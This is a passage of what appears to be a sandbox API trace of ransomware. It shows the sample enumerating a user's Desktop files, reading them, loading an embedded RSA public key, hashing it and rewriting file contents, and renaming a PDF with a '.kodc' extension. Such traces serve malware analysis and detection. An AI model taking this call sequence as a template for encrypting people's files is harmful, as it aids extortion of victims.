WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.907] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.907] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.907] CloseHandle (hObject=0x5cc) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0097.909] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0097.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0097.909] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v3m_7Lp.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v3m_7lp.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v3m_7Lp.pdf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v3m_7lp.pdf.kodc")) returned 1 [0097.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.910] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.911] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b277f0, ftCreationTime.dwHighDateTime=0x1d5bc4c, ftLastAccessTime.dwLowDateTime=0xf537cd40, ftLastAccessTime.dwHighDateTime=0x1d5c578, ftLastWriteTime.dwLowDateTime=0xf537cd40, ftLastWriteTime.dwHighDateTime=0x1d5c578, nFileSizeHigh=0x0, nFileSizeLow=0xc7aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vmGq grnpAL6-WzZ7.doc", cAlternateFileName="VMGQGR~1.DOC")) returned 1 [0097.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vmGq grnpAL6-WzZ7.doc") returned=".doc" [0097.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vmGq grnpAL6-WzZ7.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vmgq grnpal6-wzz7.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.911] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=51114) returned 1 [0097.912] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.917] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc784, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.917] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.918] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.918] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xc7aa, lpOverlapped=0x0) returned 1 [0097.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.918] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.919] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.920] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.920] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.920] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.920] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.920] GetLastError () returned 0x0 [0097.920] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.920] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.920] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.920] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.920] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc7b0) returned 0x9ba4d90 [0097.921] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340218 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340260 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.921] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7c0 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a7a8 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.922] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.922] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.923] GetCurrentThreadId () returned 0x42c [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696608 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.923] GetCurrentThreadId () returned 0x42c [0097.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.923] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7c0 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a790 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a7d8 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a7a8 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7a8 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7d8 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a7c0 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a790 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340260 | out: hHeap=0x630000) returned 1 [0097.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.928] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xc7a5, lpNumberOfBytesWritten=0x9e2fb14, 